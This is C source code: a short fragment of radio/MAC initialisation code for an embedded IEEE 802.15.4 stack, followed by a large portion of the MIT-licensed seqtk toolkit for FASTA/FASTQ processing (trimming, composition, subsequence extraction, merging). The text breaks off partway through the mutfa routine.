radio_set_operating_channel(eeprom_channel); radio_use_auto_tx_crc(true); radio_set_trx_state(TRX_OFF); mac_init(); /* Set up MAC function pointers and sicslowpan callback. */ pmac_driver->set_receive_function = setinput; pmac_driver->send = sicslowmac_dataRequest; sicslowpan_init(pmac_driver); ieee_15_4_init(&ieee15_4ManagerAddress); radio_set_trx_state(RX_AACK_ON); while(1) { PROCESS_YIELD(); mac_task(ev, data); } PROCESS_END(); } void byte_reverse(uint8_t * bytes, uint8_t num) { uint8_t tempbyte; uint8_t i, j; i = 0; j = num - 1; while(i < j) { tempbyte = bytes[i]; bytes[i] = bytes[j]; bytes[j] = tempbyte; j--; i++; } return; }
{ "language": "C" }
/* The MIT License Copyright (c) 2008-2016 Broad Institute Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #include <stdio.h> #include <ctype.h> #include <stdlib.h> #include <stdint.h> #include <inttypes.h> #include <zlib.h> #include <string.h> #include <unistd.h> #include <limits.h> #include <assert.h> #include <math.h> #include "kseq.h" KSEQ_INIT(gzFile, gzread) typedef struct { int n, m; uint64_t *a; } reglist_t; #include "khash.h" KHASH_MAP_INIT_STR(reg, reglist_t) KHASH_SET_INIT_INT64(64) typedef kh_reg_t reghash_t; reghash_t *stk_reg_read(const char *fn) { reghash_t *h = kh_init(reg); gzFile fp; kstream_t *ks; int dret; kstring_t *str; // read the list fp = strcmp(fn, "-")? gzopen(fn, "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) return 0; ks = ks_init(fp); str = calloc(1, sizeof(kstring_t)); while (ks_getuntil(ks, 0, str, &dret) >= 0) { int beg = -1, end = -1; reglist_t *p; khint_t k = kh_get(reg, h, str->s); if (k == kh_end(h)) { int ret; char *s = strdup(str->s); k = kh_put(reg, h, s, &ret); memset(&kh_val(h, k), 0, sizeof(reglist_t)); } p = &kh_val(h, k); if (dret != '\n') { if (ks_getuntil(ks, 0, str, &dret) > 0 && isdigit(str->s[0])) { beg = atoi(str->s); if (dret != '\n') { if (ks_getuntil(ks, 0, str, &dret) > 0 && isdigit(str->s[0])) { end = atoi(str->s); if (end < 0) end = -1; } } } } // skip the rest of the line if (dret != '\n') while ((dret = ks_getc(ks)) > 0 && dret != '\n'); if (end < 0 && beg > 0) end = beg, beg = beg - 1; // if there is only one column if (beg < 0) beg = 0, end = INT_MAX; if (p->n == p->m) { p->m = p->m? p->m<<1 : 4; p->a = realloc(p->a, p->m * 8); } p->a[p->n++] = (uint64_t)beg<<32 | end; } ks_destroy(ks); gzclose(fp); free(str->s); free(str); return h; } void stk_reg_destroy(reghash_t *h) { khint_t k; if (h == 0) return; for (k = 0; k < kh_end(h); ++k) { if (kh_exist(h, k)) { free(kh_val(h, k).a); free((char*)kh_key(h, k)); } } kh_destroy(reg, h); } /* constant table */ unsigned char seq_nt16_table[256] = { 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15 /*'-'*/,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15, 1,14, 2, 13,15,15, 4, 11,15,15,12, 15, 3,15,15, 15,15, 5, 6, 8,15, 7, 9, 0,10,15,15, 15,15,15,15, 15, 1,14, 2, 13,15,15, 4, 11,15,15,12, 15, 3,15,15, 15,15, 5, 6, 8,15, 7, 9, 0,10,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15, 15,15,15,15 }; unsigned char seq_nt6_table[256] = { 0, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 5, 2, 5, 5, 5, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 5, 2, 5, 5, 5, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5 }; char *seq_nt16_rev_table = "XACMGRSVTWYHKDBN"; unsigned char seq_nt16to4_table[] = { 4, 0, 1, 4, 2, 4, 4, 4, 3, 4, 4, 4, 4, 4, 4, 4 }; unsigned char seq_nt16comp_table[] = { 0, 8, 4, 12, 2, 10, 9, 14, 1, 6, 5, 13, 3, 11, 7, 15 }; int bitcnt_table[] = { 4, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4 }; char comp_tab[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 'T', 'V', 'G', 'H', 'E', 'F', 'C', 'D', 'I', 'J', 'M', 'L', 'K', 'N', 'O', 'P', 'Q', 'Y', 'S', 'A', 'A', 'B', 'W', 'X', 'R', 'Z', 91, 92, 93, 94, 95, 64, 't', 'v', 'g', 'h', 'e', 'f', 'c', 'd', 'i', 'j', 'm', 'l', 'k', 'n', 'o', 'p', 'q', 'y', 's', 'a', 'a', 'b', 'w', 'x', 'r', 'z', 123, 124, 125, 126, 127 }; static void stk_printstr(FILE *fp, const kstring_t *s, unsigned line_len) { if (line_len != UINT_MAX && line_len != 0) { int i, rest = s->l; for (i = 0; i < s->l; i += line_len, rest -= line_len) { fputc('\n', fp); if (rest > line_len) fwrite(s->s + i, 1, line_len, fp); else fwrite(s->s + i, 1, rest, fp); } fputc('\n', fp); } else { fputc('\n', fp); fputs(s->s, fp); fputc('\n', fp); } } static inline void stk_printseq_renamed(FILE *fp, const kseq_t *s, int line_len, const char *prefix, int64_t n) { fputc(s->qual.l? '@' : '>', fp); if (n >= 0) { if (prefix) fputs(prefix, fp); fprintf(fp, "%lld", (long long)n); } else fputs(s->name.s, fp); if (s->comment.l) { fputc(' ', fp); fputs(s->comment.s, fp); } stk_printstr(fp, &s->seq, line_len); if (s->qual.l) { fputc('+', fp); stk_printstr(fp, &s->qual, line_len); } } static inline void stk_printseq(FILE *fp, const kseq_t *s, int line_len) { stk_printseq_renamed(fp, s, line_len, 0, -1); } /* 64-bit Mersenne Twister pseudorandom number generator. Adapted from: http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/VERSIONS/C-LANG/mt19937-64.c which was written by Takuji Nishimura and Makoto Matsumoto and released under the 3-clause BSD license. */ typedef uint64_t krint64_t; struct _krand_t; typedef struct _krand_t krand_t; #define KR_NN 312 #define KR_MM 156 #define KR_UM 0xFFFFFFFF80000000ULL /* Most significant 33 bits */ #define KR_LM 0x7FFFFFFFULL /* Least significant 31 bits */ struct _krand_t { int mti; krint64_t mt[KR_NN]; }; static void kr_srand0(krint64_t seed, krand_t *kr) { kr->mt[0] = seed; for (kr->mti = 1; kr->mti < KR_NN; ++kr->mti) kr->mt[kr->mti] = 6364136223846793005ULL * (kr->mt[kr->mti - 1] ^ (kr->mt[kr->mti - 1] >> 62)) + kr->mti; } krand_t *kr_srand(krint64_t seed) { krand_t *kr; kr = malloc(sizeof(krand_t)); kr_srand0(seed, kr); return kr; } krint64_t kr_rand(krand_t *kr) { krint64_t x; static const krint64_t mag01[2] = { 0, 0xB5026F5AA96619E9ULL }; if (kr->mti >= KR_NN) { int i; if (kr->mti == KR_NN + 1) kr_srand0(5489ULL, kr); for (i = 0; i < KR_NN - KR_MM; ++i) { x = (kr->mt[i] & KR_UM) | (kr->mt[i+1] & KR_LM); kr->mt[i] = kr->mt[i + KR_MM] ^ (x>>1) ^ mag01[(int)(x&1)]; } for (; i < KR_NN - 1; ++i) { x = (kr->mt[i] & KR_UM) | (kr->mt[i+1] & KR_LM); kr->mt[i] = kr->mt[i + (KR_MM - KR_NN)] ^ (x>>1) ^ mag01[(int)(x&1)]; } x = (kr->mt[KR_NN - 1] & KR_UM) | (kr->mt[0] & KR_LM); kr->mt[KR_NN - 1] = kr->mt[KR_MM - 1] ^ (x>>1) ^ mag01[(int)(x&1)]; kr->mti = 0; } x = kr->mt[kr->mti++]; x ^= (x >> 29) & 0x5555555555555555ULL; x ^= (x << 17) & 0x71D67FFFEDA60000ULL; x ^= (x << 37) & 0xFFF7EEE000000000ULL; x ^= (x >> 43); return x; } #define kr_drand(_kr) ((kr_rand(_kr) >> 11) * (1.0/9007199254740992.0)) /* quality based trimming with Mott's algorithm */ int stk_trimfq(int argc, char *argv[]) { // FIXME: when a record with zero length will always be treated as a fasta record gzFile fp; kseq_t *seq; double param = 0.05, q_int2real[128]; int i, c, min_len = 30, left = 0, right = 0, fixed_len = -1; while ((c = getopt(argc, argv, "l:q:b:e:L:")) >= 0) { switch (c) { case 'q': param = atof(optarg); break; case 'l': min_len = atoi(optarg); break; case 'b': left = atoi(optarg); break; case 'e': right = atoi(optarg); break; case 'L': fixed_len = atoi(optarg); break; } } if (optind == argc) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk trimfq [options] <in.fq>\n\n"); fprintf(stderr, "Options: -q FLOAT error rate threshold (disabled by -b/-e) [%.2f]\n", param); fprintf(stderr, " -l INT maximally trim down to INT bp (disabled by -b/-e) [%d]\n", min_len); fprintf(stderr, " -b INT trim INT bp from left (non-zero to disable -q/-l) [0]\n"); fprintf(stderr, " -e INT trim INT bp from right (non-zero to disable -q/-l) [0]\n"); fprintf(stderr, " -L INT retain at most INT bp from the 5'-end (non-zero to disable -q/-l) [0]\n"); fprintf(stderr, " -Q force FASTQ output\n"); fprintf(stderr, "\n"); return 1; } fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); for (i = 0; i < 128; ++i) q_int2real[i] = pow(10., -(i - 33) / 10.); while (kseq_read(seq) >= 0) { int beg, tmp, end; double s, max; if (left || right || fixed_len > 0) { beg = left; end = seq->seq.l - right; if (beg >= end) beg = end = 0; if (fixed_len > 0 && end - beg > fixed_len) end = beg + fixed_len; } else if (seq->qual.l > min_len) { for (i = 0, beg = tmp = 0, end = seq->qual.l, s = max = 0.; i < seq->qual.l; ++i) { int q = seq->qual.s[i]; if (q < 36) q = 36; if (q > 127) q = 127; s += param - q_int2real[q]; if (s > max) max = s, beg = tmp, end = i + 1; if (s < 0) s = 0, tmp = i + 1; } /* max never set; all low qual, just give first min_len bp */ if (max == 0.) beg = 0, end = min_len; if (end - beg < min_len) { // window-based int is, imax; for (i = 0, is = 0; i < min_len; ++i) is += seq->qual.s[i] - 33; for (imax = is, beg = 0; i < seq->qual.l; ++i) { is += (int)seq->qual.s[i] - seq->qual.s[i - min_len]; if (imax < is) imax = is, beg = i - min_len + 1; } end = beg + min_len; } } else beg = 0, end = seq->seq.l; putchar(seq->is_fastq? '@' : '>'); fputs(seq->name.s, stdout); if (seq->comment.l) { putchar(' '); puts(seq->comment.s); } else putchar('\n'); fwrite(seq->seq.s + beg, 1, end - beg, stdout); putchar('\n'); if (seq->is_fastq) { puts("+"); fwrite(seq->qual.s + beg, 1, end - beg, stdout); putchar('\n'); } } kseq_destroy(seq); gzclose(fp); return 0; } /* composition */ int stk_comp(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int l, c, upper_only = 0; reghash_t *h = 0; reglist_t dummy; while ((c = getopt(argc, argv, "ur:")) >= 0) { switch (c) { case 'u': upper_only = 1; break; case 'r': h = stk_reg_read(optarg); break; } } if (argc == optind && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk comp [-u] [-r in.bed] <in.fa>\n\n"); fprintf(stderr, "Output format: chr, length, #A, #C, #G, #T, #2, #3, #4, #CpG, #tv, #ts, #CpG-ts\n"); return 1; } fp = optind < argc && strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); dummy.n= dummy.m = 1; dummy.a = calloc(1, 8); while ((l = kseq_read(seq)) >= 0) { int i, k; reglist_t *p = 0; if (h) { khint_t k = kh_get(reg, h, seq->name.s); if (k != kh_end(h)) p = &kh_val(h, k); } else { p = &dummy; dummy.a[0] = l; } for (k = 0; p && k < p->n; ++k) { int beg = p->a[k]>>32, end = p->a[k]&0xffffffff; int la, lb, lc, na, nb, nc, cnt[11]; if (beg > 0) la = seq->seq.s[beg-1], lb = seq_nt16_table[la], lc = bitcnt_table[lb]; else la = 'a', lb = -1, lc = 0; na = seq->seq.s[beg]; nb = seq_nt16_table[na]; nc = bitcnt_table[nb]; memset(cnt, 0, 11 * sizeof(int)); for (i = beg; i < end; ++i) { int is_CpG = 0, a, b, c; a = na; b = nb; c = nc; na = seq->seq.s[i+1]; nb = seq_nt16_table[na]; nc = bitcnt_table[nb]; if (b == 2 || b == 10) { // C or Y if (nb == 4 || nb == 5) is_CpG = 1; } else if (b == 4 || b == 5) { // G or R if (lb == 2 || lb == 10) is_CpG = 1; } if (upper_only == 0 || isupper(a)) { if (c > 1) ++cnt[c+2]; if (c == 1) ++cnt[seq_nt16to4_table[b]]; if (b == 10 || b == 5) ++cnt[9]; else if (c == 2) { ++cnt[8]; } if (is_CpG) { ++cnt[7]; if (b == 10 || b == 5) ++cnt[10]; } } la = a; lb = b; lc = c; } if (h) printf("%s\t%d\t%d", seq->name.s, beg, end); else printf("%s\t%d", seq->name.s, l); for (i = 0; i < 11; ++i) printf("\t%d", cnt[i]); putchar('\n'); } fflush(stdout); } free(dummy.a); kseq_destroy(seq); gzclose(fp); return 0; } int stk_randbase(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int l; if (argc == 1) { fprintf(stderr, "Usage: seqtk randbase <in.fa>\n"); return 1; } fp = (strcmp(argv[1], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[1], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { int i; printf(">%s", seq->name.s); for (i = 0; i < l; ++i) { int c, b, a, j, k, m; b = seq->seq.s[i]; c = seq_nt16_table[b]; a = bitcnt_table[c]; if (a == 2) { m = (drand48() < 0.5); for (j = k = 0; j < 4; ++j) { if ((1<<j & c) == 0) continue; if (k == m) break; ++k; } seq->seq.s[i] = islower(b)? "acgt"[j] : "ACGT"[j]; } if (i%60 == 0) putchar('\n'); putchar(seq->seq.s[i]); } putchar('\n'); } kseq_destroy(seq); gzclose(fp); return 0; } int stk_hety(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int l, c, win_size = 50000, n_start = 5, win_step, is_lower_mask = 0; char *buf; uint32_t cnt[3]; if (argc == 1) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk hety [options] <in.fa>\n\n"); fprintf(stderr, "Options: -w INT window size [%d]\n", win_size); fprintf(stderr, " -t INT # start positions in a window [%d]\n", n_start); fprintf(stderr, " -m treat lowercases as masked\n"); fprintf(stderr, "\n"); return 1; } while ((c = getopt(argc, argv, "w:t:m")) >= 0) { switch (c) { case 'w': win_size = atoi(optarg); break; case 't': n_start = atoi(optarg); break; case 'm': is_lower_mask = 1; break; } } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); win_step = win_size / n_start; buf = calloc(win_size, 1); while ((l = kseq_read(seq)) >= 0) { int x, i, y, z, next = 0; cnt[0] = cnt[1] = cnt[2] = 0; for (i = 0; i <= l; ++i) { if ((i >= win_size && i % win_step == 0) || i == l) { if (i == l && l >= win_size) { for (y = l - win_size; y < next; ++y) --cnt[(int)buf[y % win_size]]; } if (cnt[1] + cnt[2] > 0) printf("%s\t%d\t%d\t%.2lf\t%d\t%d\n", seq->name.s, next, i, (double)cnt[2] / (cnt[1] + cnt[2]) * win_size, cnt[1] + cnt[2], cnt[2]); next = i; } if (i < l) { y = i % win_size; c = seq->seq.s[i]; if (is_lower_mask && islower(c)) c = 'N'; c = seq_nt16_table[c]; x = bitcnt_table[c]; if (i >= win_size) --cnt[(int)buf[y]]; buf[y] = z = x > 2? 0 : x == 2? 2 : 1; ++cnt[z]; } } } free(buf); kseq_destroy(seq); gzclose(fp); return 0; } int stk_gap(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int len, c, min_size = 50; if (argc == 1) { fprintf(stderr, "Usage: seqtk gap [-l %d] <in.fa>\n", min_size); return 1; } while ((c = getopt(argc, argv, "l:")) >= 0) { switch (c) { case 'l': min_size = atoi(optarg); break; } } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((len = kseq_read(seq)) >= 0) { int i, l; for (i = l = 0; i <= len; ++i) { c = i < len? seq_nt6_table[(uint8_t)seq->seq.s[i]] : 5; if (i == len || (c >= 1 && c <= 4)) { if (l > 0 && l >= min_size) printf("%s\t%d\t%d\n", seq->name.s, i - l, i); l = 0; } else ++l; } } kseq_destroy(seq); gzclose(fp); return 0; } /* subseq */ int stk_subseq(int argc, char *argv[]) { khash_t(reg) *h = kh_init(reg); gzFile fp; kseq_t *seq; int l, i, j, c, is_tab = 0, line = 0; khint_t k; while ((c = getopt(argc, argv, "tl:")) >= 0) { switch (c) { case 't': is_tab = 1; break; case 'l': line = atoi(optarg); break; } } if (optind + 2 > argc) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk subseq [options] <in.fa> <in.bed>|<name.list>\n\n"); fprintf(stderr, "Options: -t TAB delimited output\n"); fprintf(stderr, " -l INT sequence line length [%d]\n\n", line); fprintf(stderr, "Note: Use 'samtools faidx' if only a few regions are intended.\n\n"); return 1; } h = stk_reg_read(argv[optind+1]); if (h == 0) { fprintf(stderr, "[E::%s] failed to read the list of regions in file '%s'\n", __func__, argv[optind+1]); return 1; } // subseq fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { reglist_t *p; k = kh_get(reg, h, seq->name.s); if (k == kh_end(h)) continue; p = &kh_val(h, k); for (i = 0; i < p->n; ++i) { int beg = p->a[i]>>32, end = p->a[i]; if (beg >= seq->seq.l) { fprintf(stderr, "[subseq] %s: %d >= %ld\n", seq->name.s, beg, seq->seq.l); continue; } if (end > seq->seq.l) end = seq->seq.l; if (is_tab == 0) { printf("%c%s", seq->qual.l == seq->seq.l? '@' : '>', seq->name.s); if (beg > 0 || (int)p->a[i] != INT_MAX) { if (end == INT_MAX) { if (beg) printf(":%d", beg+1); } else printf(":%d-%d", beg+1, end); } if (seq->comment.l) printf(" %s", seq->comment.s); } else printf("%s\t%d\t", seq->name.s, beg + 1); if (end > seq->seq.l) end = seq->seq.l; for (j = 0; j < end - beg; ++j) { if (is_tab == 0 && (j == 0 || (line > 0 && j % line == 0))) putchar('\n'); putchar(seq->seq.s[j + beg]); } putchar('\n'); if (seq->qual.l != seq->seq.l || is_tab) continue; printf("+"); for (j = 0; j < end - beg; ++j) { if (j == 0 || (line > 0 && j % line == 0)) putchar('\n'); putchar(seq->qual.s[j + beg]); } putchar('\n'); } } // free kseq_destroy(seq); gzclose(fp); stk_reg_destroy(h); return 0; } /* mergefa */ int stk_mergefa(int argc, char *argv[]) { gzFile fp[2]; kseq_t *seq[2]; int i, l, c, is_intersect = 0, is_haploid = 0, qual = 0, is_mask = 0, is_randhet = 0; uint64_t cnt[5]; while ((c = getopt(argc, argv, "himrq:")) >= 0) { switch (c) { case 'i': is_intersect = 1; break; case 'h': is_haploid = 1; break; case 'm': is_mask = 1; break; case 'r': is_randhet = 1; break; case 'q': qual = atoi(optarg); break; } } if (is_mask && is_intersect) { fprintf(stderr, "[%s] `-i' and `-h' cannot be applied at the same time.\n", __func__); return 1; } if (optind + 2 > argc) { fprintf(stderr, "\nUsage: seqtk mergefa [options] <in1.fa> <in2.fa>\n\n"); fprintf(stderr, "Options: -q INT quality threshold [0]\n"); fprintf(stderr, " -i take intersection\n"); fprintf(stderr, " -m convert to lowercase when one of the input base is N\n"); fprintf(stderr, " -r pick a random allele from het\n"); fprintf(stderr, " -h suppress hets in the input\n\n"); return 1; } for (i = 0; i < 2; ++i) { fp[i] = strcmp(argv[optind+i], "-")? gzopen(argv[optind+i], "r") : gzdopen(fileno(stdin), "r"); seq[i] = kseq_init(fp[i]); } if (fp[0] == 0 || fp[1] == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } cnt[0] = cnt[1] = cnt[2] = cnt[3] = cnt[4] = 0; srand48(11); while (kseq_read(seq[0]) >= 0) { int min_l, c[2], b[2], is_upper; kseq_read(seq[1]); if (strcmp(seq[0]->name.s, seq[1]->name.s)) fprintf(stderr, "[%s] Different sequence names: %s != %s\n", __func__, seq[0]->name.s, seq[1]->name.s); if (seq[0]->seq.l != seq[1]->seq.l) fprintf(stderr, "[%s] Unequal sequence length: %ld != %ld\n", __func__, seq[0]->seq.l, seq[1]->seq.l); min_l = seq[0]->seq.l < seq[1]->seq.l? seq[0]->seq.l : seq[1]->seq.l; printf(">%s", seq[0]->name.s); for (l = 0; l < min_l; ++l) { c[0] = seq[0]->seq.s[l]; c[1] = seq[1]->seq.s[l]; if (seq[0]->qual.l && seq[0]->qual.s[l] - 33 < qual) c[0] = tolower(c[0]); if (seq[1]->qual.l && seq[1]->qual.s[l] - 33 < qual) c[1] = tolower(c[1]); if (is_intersect) is_upper = (isupper(c[0]) || isupper(c[1]))? 1 : 0; else if (is_mask) is_upper = (isupper(c[0]) || isupper(c[1]))? 1 : 0; else is_upper = (isupper(c[0]) && isupper(c[1]))? 1 : 0; c[0] = seq_nt16_table[c[0]]; c[1] = seq_nt16_table[c[1]]; if (c[0] == 0) c[0] = 15; if (c[1] == 0) c[1] = 15; b[0] = bitcnt_table[c[0]]; b[1] = bitcnt_table[c[1]]; if (is_upper) { if (b[0] == 1 && b[1] == 1) { if (c[0] == c[1]) ++cnt[0]; else ++cnt[1]; } else if (b[0] == 1 && b[1] == 2) ++cnt[2]; else if (b[0] == 2 && b[1] == 1) ++cnt[3]; else if (b[0] == 2 && b[1] == 2) ++cnt[4]; } if (is_haploid && (b[0] > 1 || b[1] > 1)) is_upper = 0; if (is_intersect) { c[0] = c[0] & c[1]; if (c[0] == 0) is_upper = 0; // FIXME: is this a bug - c[0] cannot be 0! } else if (is_mask) { if (c[0] == 15 || c[1] == 15) is_upper = 0; c[0] &= c[1]; if (c[0] == 0) is_upper = 0; } else if (is_randhet) { if (b[0] == 1 && b[1] == 1) { // two homs c[0] |= c[1]; } else if (((b[0] == 1 && b[1] == 2) || (b[0] == 2 && b[1] == 1)) && (c[0]&c[1])) { // one hom, one het c[0] = (lrand48()&1)? (c[0] & c[1]) : (c[0] | c[1]); } else if (b[0] == 2 && b[1] == 2 && c[0] == c[1]) { // double hets if (lrand48()&1) { if (lrand48()&1) { for (i = 8; i >= 1; i >>= 1) // pick the "larger" allele if (c[0]&i) c[0] &= i; } else { for (i = 1; i <= 8; i <<= 1) // pick the "smaller" allele if (c[0]&i) c[0] &= i; } } // else set as het } else is_upper = 0; } else c[0] |= c[1]; c[0] = seq_nt16_rev_table[c[0]]; if (!is_upper) c[0] = tolower(c[0]); if (l%60 == 0) putchar('\n'); putchar(c[0]); } putchar('\n'); } fprintf(stderr, "[%s] (same,diff,hom-het,het-hom,het-het)=(%ld,%ld,%ld,%ld,%ld)\n", __func__, (long)cnt[0], (long)cnt[1], (long)cnt[2], (long)cnt[3], (long)cnt[4]); return 0; } int stk_famask(int argc, char *argv[]) { gzFile fp[2]; kseq_t *seq[2]; int i, l, c; while ((c = getopt(argc, argv, "")) >= 0); if (argc - optind < 2) { fprintf(stderr, "Usage: seqtk famask <src.fa> <mask.fa>\n"); return 1; } for (i = 0; i < 2; ++i) { fp[i] = strcmp(argv[optind+i], "-")? gzopen(argv[optind+i], "r") : gzdopen(fileno(stdin), "r"); seq[i] = kseq_init(fp[i]); } if (fp[0] == 0 || fp[1] == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } while (kseq_read(seq[0]) >= 0) { int min_l, c[2]; kseq_read(seq[1]); if (strcmp(seq[0]->name.s, seq[1]->name.s)) fprintf(stderr, "[%s] Different sequence names: %s != %s\n", __func__, seq[0]->name.s, seq[1]->name.s); if (seq[0]->seq.l != seq[1]->seq.l) fprintf(stderr, "[%s] Unequal sequence length: %ld != %ld\n", __func__, seq[0]->seq.l, seq[1]->seq.l); min_l = seq[0]->seq.l < seq[1]->seq.l? seq[0]->seq.l : seq[1]->seq.l; printf(">%s", seq[0]->name.s); for (l = 0; l < min_l; ++l) { c[0] = seq[0]->seq.s[l]; c[1] = seq[1]->seq.s[l]; if (c[1] == 'x') c[0] = tolower(c[0]); else if (c[1] != 'X') c[0] = c[1]; if (l%60 == 0) putchar('\n'); putchar(c[0]); } putchar('\n'); } return 0; } int stk_mutfa(int argc, char *argv[]) { khash_t(reg) *h = kh_init(reg); gzFile fp; kseq_t *seq; kstream_t *ks; int l, i, dret; kstring_t *str; khint_t k; if (argc < 3) { fprintf(stderr, "Usage: seqtk mutfa <in.fa> <in.snp>\n\n"); fprintf(stderr, "Note: <in.snp> contains at least four columns per line which are:\n"); fprintf(stderr, " 'chr 1-based-pos any base-changed-to'.\n"); return 1; } // read the list str = calloc(1, sizeof(kstring_t)); fp = strcmp(argv[2], "-")? gzopen(argv[2], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = ks_init(fp); while (ks_getuntil(ks, 0, str, &dret) >= 0) { char *s = strdup(str->s); int beg = 0, ret; reglist_t *p; k = kh_get(reg, h, s); if (k == kh_end(h)) { k = kh_put(reg, h, s, &ret); memset(&kh_val(h, k), 0, sizeof(reglist_t)); } p = &kh_val(h, k); if (ks_getuntil(ks, 0, str, &dret) > 0) beg = atol(str->s) - 1; // 2nd col ks_getuntil(ks, 0, str, &dret); // 3rd col ks_getuntil(ks, 0, str, &dret); // 4th col // skip the rest of the line if (dret != '\n') while ((dret = ks_getc(ks)) > 0 && dret != '\n'); if (isalpha(str->s[0]) && str->l == 1) { if (p->n == p->m) { p->m = p->m? p->m<<1 : 4; p->a = realloc(p->a, p->m * 8); } p->a[p->n++] = (uint64_t)beg<<32 | str->s[0]; } } ks_destroy(ks); gzclose(fp); free(str->s); free(str); // mutfa fp = strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while ((l = kseq_read(seq)) >= 0) { reglist_t *p; k = kh_get(reg, h, 